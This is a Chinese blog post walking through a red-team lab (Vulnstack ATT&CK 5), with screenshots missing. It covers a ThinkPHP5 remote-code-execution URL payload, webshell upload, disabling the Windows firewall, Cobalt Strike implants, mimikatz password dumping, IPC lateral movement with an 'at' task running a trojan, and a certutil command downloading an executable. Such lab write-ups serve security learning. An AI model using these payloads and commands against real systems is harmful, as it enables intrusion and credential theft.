ATT&CK红队评估(五)

最新推荐文章于 2024-07-17 11:29:00 发布
最新推荐文章于 2024-07-17 11:29:00 发布
阅读量793 收藏 12
点赞数 16
分类专栏: 内网靶场 文章标签: 网络安全 web安全 安全威胁分析 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/139563772
版权

环境搭建

靶场拓扑图:

靶机下载地址: 漏洞详情

外网信息收集

确定目标靶机地址:

发现主机192.168.135.150主机是本次攻击的目标地址。探测靶机开放的端口信息:

目标靶机开放了两个端口:80、3306,那没什么意外的话就是 web服务和mysql服务

目标靶机开放了80端口,中间件是Apache 3306是mysql服务,系统是windows系统。

默认漏洞脚本的探测结果,除了几个存在的敏感路径之外,似乎看不到什么信息。

看到了两个端口,先看看3306端口吧:是不是存在弱口令等信息:

发现存在白名单,不允许我们连接。

ThinkPHP5 RCE

80端口上是thinkphp的框架,版本是v5:

没有路由信息,接下来做一个目录扫描,看看有什么目录泄露出来:

这里做了递归扫描!看到了几个文件add.php文件,这个文件应该不是thinkphp默认搭建成功存在的文件。还有git信息的泄露!

先看下robots文件中是不是给出了相关的敏感路径:

robots文件中没有什么路径。看一下add文件:

看来是存在waf了,需要进行bypass。这个页面的左上角还存在一个GIF89a,尝试输入下,然后抓包看看数据包中的信息:

这里我最开始先去用ThinkPHP的漏洞检测工具,进行了检测,发现存在RCE。

http://192.168.135.150/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

另一个payload:

thinkphp5 5.0.22/5.1.29远程代码执行漏洞_thinkphp v5.0.22-CSDN博客

找到了一篇文章,直接写马进去:

返回了29,尝试访问写的马:

没问题,成功执行代码,连接蚁剑:

蚁剑连接成功!

administrator权限!

上线CS

先看看防火墙,杀毒软件等信息的开启状态:

netsh advfirewall show allprofile state

可以看到防火墙全部开启的状态,由于我们现在的权限还是很高的,直接关闭。当然也可以尝试正向链接。

netsh advfirewall set allprofile state off #关闭防火墙命令

接下来再看看杀软的信息:

tasklist /svc

似乎没有杀软存在,那就可以直接生成CS的反向🐎,上线CS了:

CS配置监听器:

上传马:

执行等待上线:

CS上线成功:

内网信息收集

可以看到存在两个网卡!192.168.138.0/24是另一张网卡!

使用mimikatz,拿到了明文的账号密码信息。存在域环境!

查看域内成员信息,发现了存在leo、admin用户。

域控就是administrator~

这里先去搭建了socks代理。

查看arp缓存表,发现了192.168.138.138主机存活:

确定主机之间能够通信,然后探测端口号:

看到192.168.138.138主机开放的端口比较多。利用上面的socks代理,先看看88端口上是不是存在web服务:

横向上线DC

但是一直访问不到。由于目标主机开放了139端口,似乎没有开放445端口。这里尝试一下利用IPC进行横向移动。

建立IPC链接!尝试访问192.168.138.138主机的共享C盘:

将正向马传至控下来的web主机:

利用copy命令,将他上传到192.168.138.138主机上:

查看到已经上传上去了!利用定时任务尝试执行木马文件。

这里使用了at和schtasks命令先测试了一下 192.168.138.138系统的版本信息:

at命令是 适用于windows 2012之前的操作系统
schtasks命令适用于windows 2012之后(包括windows 2012)操作系统

判断了一下,发现目标的机器是windows 2012之前的系统,它不支持schtasks命令。那么接下来我们就创建一个计划任务,然后等待执行,上线:

利用 net time 判断了当前的时间
然后根据当前的时间信息,创建一个定时任务
at \\192.168.138.138 0:07 c:\3333.exe

当时间到了0:07的时候,程序被执行,由于我们生成的马是正向的马,所以尝试使用connect 进行连接。

但是发现主机并没有上线。

确定一下木马文件没有被杀软等ban掉:

木马确实还在,但是无法上线,怀疑是防火墙规则,建立了入站规则,导致我们无法上线。换成反向马,再试试,反向马需要做转发上线。

建立转发上线的监听器:

继续将木马文件上传到外网主机上面:

再次利用copy命令复制文件:

上传上去之后,再次创建计划任务,尝试上线:

但是似乎还是无法上线。很奇怪。利用impacket包的atexec尝试进行命令执行:GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols. (impacket包下载地址)

正常能执行命令。权限还是system权限。那就尝试再次下载文件:

certutil.exe -urlcache -split -f http://192.168.138.136:80/6666.exe fx.exe

下载成功之后,文件会在C:\Windows\System32 目录下面保存:

利用共享目录查看一下是不是存在了:

没问题,下载成功!接下来再次利用脚本执行命令:

发现CS上成功上线了主机:

看一下,防火墙的状态:

防火墙全开了。应该也没有什么杀软,不然马都被杀了。

开启3389端口

关了防火墙,尝试远程上去,利用mimikatz获取到了明文的密码:

利用账号密码,同时和隧道:

rdesktop进行远程连接!

Y4y17
关注
  • 16
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队攻防之特殊场景上线cs和msf
自强不息
11-18 401
倘见玉皇先跪奏:他生永不落红尘
攻防演练期间一次对某企业的渗透测试
tigerman20201的博客
08-27 398
某次攻防演练中,主办方只提供了目标企业名称,其他信息都需要自己收集,这篇文章记录一下渗透过程。
Vulnstack----5、ATT&CK红队评估实战靶场
七天
08-31 1835
域名为sun.com域管理员为Administrator。ping DC$得到域控的IP:192.168.138.138。账号密码:sun\heart 123.com 和 sun\Administrator dc123.com。双网卡,外网ip:192.168.111.129,内网ip:192.168.138.136。模拟外网IP:192.168.111.129(在Win7主机开启IP自动获取)蚁剑执行生成的payload,反弹回一个meterpreter的shell。2.执行whoami。
【红日靶场系列】ATT&CK红队评估5
weixin_45632448的博客
09-29 1689
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-30 1618
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
01 ATT&CK红队评估
qq_52671379的博客
07-19 384
01 ATT&CK红队评估
【靶场系列】01 ATT&CK红队评估
qq_41169485的博客
04-21 1546
web服务器,应设置为双网卡主机,其中NAT网卡与攻击机相连,VMnet1网卡与其他两台靶机相连 (图中设置错误,应设置网络适配器1为VMnet1)发现l.php探针和phpmyadmin目录,访问探针,暴露了该服务器使用的是phpstudy,所以猜测mysql账号密码为。为了保持会话,我们把后门注入到一个正常的程序里,但又不能影响程序运行,这里选择Everything.exe。VMnet1网卡为仅主机模式,设置IP段为192.168.52.0,确保三台主机均可以相互ping通。
MITRE ATT&CK实践入门1
08-04
本文将围绕四个关键应用场景——网络威胁情报、检测与分析、对手模拟与红队以及评估与工程,对MITRE ATT&CK的实践应用进行详细阐述。 一、网络威胁情报 对于初学者,可以从公开源获取已映射到ATT&CK框架的报告,...
关于如何建立企业内部的ATT&CK的介绍说明.zip
11-07
8. **持续改进**:定期评估和调整安全策略,确保其与ATT&CK框架保持同步,同时根据实际检测到的威胁进行调整。 9. **实战演练**:通过模拟攻击或红队演练,检验企业的防御能力,找出不足并进行修复。 10. **共享...
TDC2021 - Mitre Att_ck.pdf
10-06
总结来说,《TDC2021 - Mitre Att&ck.pdf》强调了在网络安全领域,使用Mitre Att&ck框架和Cyber Kill Chain模型对于提升红队、蓝队以及紫队协作的重要性。这些工具和概念有助于组织更好地理解攻击者的操作模式,从而...
如何管理红队.pdf
10-06
同时,作为Mitre Att&ck的贡献者,他们对已知攻击技术和战术有深入理解,能够运用这些知识来设计更有效的渗透测试场景。 此外,国际认证(+90 Certificações internacionais)表明团队成员接受过广泛的专业训练,...
红队评估需要掌握的技术(学无止境)
汤圆的博客
01-16 2359
1.小伙伴整理一些,我补充了一些. 红队技术目录 前渗透测试·打点 1.信息收集 1.1 子域名收集 1.2 同备案查询 1.3 C段查询 1.4 旁站查询 1.5 Github\Gitee\Coding 第三方代码托管信息查询 2.漏洞扫描工具 2.1 AWVS 2.2 Nessus 3.漏洞基础知识 3.1 弱口令 3.2 SQL注入 3.3 XSS跨站 3.4 CSRF 3.5 文件包含、文...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8338
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】资产记录工具 Hacker Asset Logger 安装使用详细教程
等风来
07-15 151
在对某一应用程序的多个页面、对多个相关联的应用程序进行渗透测试的过程中,多个请求包的参数、功能之间可能存在一定的联系。例如,在A页面触发的请求包中,通过UID可获取CustomerID;在B页面触发的请求包中,CustomerID用于Cookie身份鉴定、获取用户敏感信息、获取用户订单号OrderNo;在C页面触发的请求包中,OrderNo用于获取对应用户的敏感信息,如姓名、电话、地址、身份证。
网络安全】基于PHP study的DVWA靶场搭建教程
等风来
07-14 473
接着访问:http://127.0.0.1/dvwa-master,拉到页面最下面点击Create/Reset Databse 跳转至该页面后,输入admin、password即可登录:
网络安全-网络安全及其防护措施8
最新发布
LS_Ai的博客
07-17 930
数据中心网络架构是指数据中心内部网络的设计和结构,其目的是提供高性能、高可用性和高扩展性的网络连接。合理的数据中心网络架构能够支持大规模数据处理和传输,满足数据中心的业务需求,提高整体运营效率。负载均衡是一种分配网络流量和计算任务的方法,旨在优化资源利用率、提高系统性能和增强服务可用性。通过将请求分配到多个服务器上,负载均衡避免了单点故障和性能瓶颈,确保系统稳定和高效运行。网络安全策略是指为保护网络和信息系统的安全而制定的一系列规则和措施。
网络安全法律框架更新:最新合规要求与企业应对策略
2301_79955948的博客
07-14 936
首先,企业应提升网络安全意识,完善责任制度,并关注新法律法规的协调衔接。2022年,《网络安全法》迎来了首次修改,这一修订主要是为了与《数据安全法》和《个人信息保护法》等新实施的法律进行衔接协调,完善法律责任制度,进一步保障网络安全。新规定对原有的触发条件进行了优化,例如,关键信息基础设施运营者向境外提供个人信息或重要数据,以及特定数量的个人信息或敏感个人信息的跨境传输,都需要进行安全评估。通过上述措施,企业不仅能够提升自身的网络安全防护能力,还能促进国内网络安全产业的高质量发展,为国家网络安全贡献力量。
ATT\\\\&CK红队评估实战靶场
08-16
我很抱歉,但是我无法回答你的问题。可能是因为你提供的引用内容与你的问题不相关。请提供更具体的问题,我会尽力回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Windows系统——ATT&CK红队评估实战靶场(二)——CS方式](https://blog.csdn.net/qq_44029310/article/details/126039321)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK红队评估实战靶场(二)](https://blog.csdn.net/qq_53263789/article/details/115282950)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值